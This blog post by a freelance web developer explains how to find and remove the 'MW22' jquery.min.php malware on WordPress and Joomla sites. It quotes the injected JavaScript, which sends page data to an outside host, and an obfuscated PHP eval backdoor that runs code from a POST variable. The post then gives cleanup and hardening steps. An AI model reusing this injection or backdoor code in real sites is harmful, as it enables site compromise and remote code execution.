My Projects, Uncategorized

JS:MW22 jquery.min.php malware & how to remove it


So, I am a freelancer web-dev, malware removal guy, python scraping guy, joomla migration guy, wordpress guy, agency manager ….. you get the deal. Anyway, I have started noticing these “MW22” “jquery.min.php” malware more & more recently.  The footprints are mostly on wordpress and joomla sites, and the malware tries to exploit old versions of the CMSs.
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.sater.com.tn/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('' + '');}

This block of text will be present in your templates’ index.php file in Joomla and header.php file in wordpress. Quite simple to remove it, right? Just remove the aforementioned offending block of code from your index.phps and everybody’s happy. Sucuri and virustotal no longer show your site as malicious/infected. You are yet again in your final glorious form of a shining knight in white armour. You have purged the realm of the darkness and are applauded by your bosses again.

Except, you are wrong. This malware leaves a TON of backdoors+php shells in every conceivable corner of your site. It not only adds new backdoor files but also modifies existing files. A typical backdoor looks like this:

 

<?php                                                                                                                                                                                                                                                      $lsie30 =”o46cbea_dtsp” ;$eeb4 = strtolower($lsie30[4].$lsie30[6]. $lsie30[10].$lsie30[5].$lsie30[2]. $lsie30[1] . $lsie30[7]. $lsie30[8]. $lsie30[5]. $lsie30[3].$lsie30[0].$lsie30[8].$lsie30[5] ); $lbz4= strtoupper( $lsie30[7].$lsie30[11]. $lsie30[0]. $lsie30[10].$lsie30[9]) ;if( isset( ${ $lbz4 } [‘ne9fa0d’]) ){eval ( $eeb4 ( ${$lbz4}[‘ne9fa0d’] ) ) ;}?>

This code basically searches for the existence of a POST variable with a random name in the HTTP request to this file. Once it receives such a request, it will then basically run the contents of that variable.

Hundreds of files like user.php and xml.php will be added. Random files of your website will be modified. Just do a grep -R “eval” of your website root, select malicious files and delete them. Just grepping for eval throws up a lot of false negatives, which you can’t delete/modify.

Now, harden up your system. Change passwords, look for added users, changes in groups, unidentified logins etc. Use programs that notify you whenever your web root folder content changes. If nothing is available, use a LSM kernel module if allowed. Use logs the way they were intended to be used: for analysis.

And for the love of everything that is holy, update your CMS. Allow automatic update if it is possible. Keep backups.

Special advice for wordpress users: Use Wordfence. Regular scans, etc.

PS: Want me to take a look at your website? Contact me using the Contact page.

Standard

3 thoughts on “JS:MW22 jquery.min.php malware & how to remove it

  1. Pingback: Back after a Malware Hack – MarcForrest.com

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s